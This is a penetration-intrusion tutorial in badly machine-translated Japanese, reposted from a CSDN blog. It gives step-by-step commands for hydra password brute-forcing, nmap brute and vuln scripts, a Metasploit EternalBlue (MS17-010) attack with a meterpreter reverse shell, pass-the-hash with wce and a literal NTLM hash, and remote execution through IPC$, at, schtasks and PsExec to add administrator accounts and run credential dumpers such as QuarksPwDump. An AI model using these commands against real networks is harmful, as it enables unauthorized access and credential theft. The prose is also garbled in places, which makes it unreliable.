ネットワークの挿入 - 従来の方法やアイデアが(......弱いパスワード、ms17_010使用、ハッシュ注入、リモート接続&実行プログラムをスキャンし、ポートスキャン)を浸透

ポートスキャン

共通ポートと攻撃

特定のスキャン方法ポートスキャンツールの使用を詳細に私の他の記事を、ジャンプするにはここをクリック

弱いパスワードをスキャン

弱いパスワードのスキャン、例えば、mysqlの、VNC、RDP、HTTPサービスにログインするために管理し、他の弱いパスワード、あなたがツールをスキャンし、弱いパスワードの一部を使用することができ、XSCAN、ヒドラ、クラゲ、nmapののように。あなたはまた、より多くの、より良いツールを自分自身を見つけることができます

悪弊

nmapのスキャン1.まず開いているポート

ヒドラ弱いパスワードの2.は、ポートスキャンをスキャンすることができます

hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)

 -lユーザ名-Lパスワード辞書を爆破指定-P指定されたユーザ名-pパスワード辞書をブラストブラストブラスト指定された特定

nmapのスクリプト

NAMPのインストールディレクトリの下のスクリプト:スクリプトのパス

ブラストスクリプト:ブルート脆弱性検出スクリプト:vuln

使用

nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip

msfconsole

msfconsoleに入ります1

利用可能対応したスクリプトの脆弱性をチェックしてください。2.

search 17_010

いくつかの脆弱性スキャンスクリプトをチェックしてください。3.

use auxiliary/scanner/

4.ネットワークセグメントに指定されたスクリプトをスキャンする脆弱なマシン

use auxiliary/scanner/smb/smb_ms17_010 
set threads 10
set rhosts 要扫描的网段/24
exploit

EXPを攻撃する脆弱適切なマシンを選択します5。

use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit

ハッシュ注入

原則

ハッシュ注入原理は、我々は良いハッシュを用意しているローカルまたはドメインのユーザーは、ターゲットマシンを取得するには、ログインIPC同じ時間の使用で、ローカルマシンにログインするかのようにされ、その結果、ターゲットマシンのローカル認証プロセスのLsass.exe行くに注入されます権威。ローカルまたはドメインユーザーのターゲットマシンのハッシュのために、それはNTLMハッシュをクラックすることができない人々に対処するために、あなた自身の想像力、自身注入ハッシュをプレイするために取得する方法

方法

1.最初の使用は、ネットワーク内のマシンのハッシュ値を取得WCE、および複雑すぎる壊すことができません

wce -l

使用方法2.原因は、多くの場合、ネットワークパスワードの多くのマシンが(同じパスワードのハッシュ値が同じである場合)と同じです

他のマシン3.が着陸にハッシュを取得しようと、着陸は、アカウントのパスワードの場合と同じにすることができます

ターゲット名またはドメイン名を取得します。1.

ping -a 目标机ip

2.着陸を使用してハッシュ値を取得する前に、何の代替はありません0利用可能ntlmhash

wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

デフォルトでは、共有ファイルをCドライブターゲットマシンへ3.リモートアクセス

dir \\目标机ip\c$

ローカルマシンにマップされたターゲットプレート4 C

net use z: \\目标机ip\c$

リモート接続&実行手順

スケジュールされたタスクの追加

スケジュールされたタスクで

ご注意ください

ユースケース:ターゲットマシンアカウントのパスワードを取得しますが、リモートデスクトップ接続ができない
ニーズは、タスクスケジューラサービスを開くには

1.使用してIPC $のデフォルトでは、ターゲット・マシンへのリモート接続を共有しました

net use \\目标机ip /user:administrator 密码

目標時間を確認してください2。

net time \\目标机ip

スケジュールされたタスクの実行時に追加3

3.1ダイレクトコマンド実行

at \\目标机ip 时间 命令

例:
ユーザーを作成します。

at \\192.168.16.158 12:50 net user zs 123.com /add

Administratorsグループにユーザーを追加します。

at \\192.168.16.158 12:50 localgroup administrators zs /add

3.2スクリプトを使用して

batファイルを作成し、新しいユーザーを作成するためのコンテンツとのAdministratorsグループに追加します

ターゲットマシンバットにファイルをコピーします。

copy 1.bat \\目标机ip\c$\1.bat

このスクリプトを実行するようにスケジュールされたタスクの追加

at \\目标机ip 时间 脚本路径

 

4.すべてのタスクのリストでターゲットマシンを確認

at \\192.168.16.158

追加でschtasksスケジュールされたタスクの実行

なお、
ターゲットマシンアカウントのパスワードを取得するが、リモートデスクトップ接続できません:状況の使用を
あなたが使用する前に2003タスクスケジューラサービス後にシステムの電源をオンにする必要があります

1.新規ユーザーを作成し、Administratorsグループに追加するbatファイル、コンテンツを作成します。

2.使用してIPC $のデフォルトでは、ターゲット・マシンへのリモート接続を共有しました

net use \\目标机ip /user:administrator 密码

3.ターゲットマシンバットにファイルをコピーします。

copy 1.bat \\目标机ip\c$\1.bat

4.レビュー対象時間

net time \\目标机ip

次のコマンドでschtasksは、スケジュールされたタスクを追加入力します。5.

schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system

プラス/ RUシステムも除去することができ、ユーザのシステムにより実行されると、スクリプトは、単一のパスコマンドで置き換えることができます

6.直接実施計画は、タスクの実行ではありません

schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

7. [削除] [タスク

schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

PSEXECリモート実行

1.ターゲットにローカル、リモートのアップロードソフトウェアを使用します

net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\

2.対象地域のプログラムを実行します

PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序

最初の実行のボックスを再生されます、-accepteulaこのパラメータ缶バイパス入力してください

3. PSEXEC独自のローカルプログラムのパラメータがターゲットマシンにアップロードされ、自動的に実行された後に削除

Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d

-c <[パス]ファイル名>:リモートマシンと実行(ファイルが自動的に実行の終了後に削除されます。注)にファイルをコピーする
プログラムがフィニッシュに復帰するのを待っていません-d

公開された66元の記事 ウォンの賞賛234 ・は 30000 +を見て

おすすめ

転載: blog.csdn.net/wsnbbz/article/details/105102705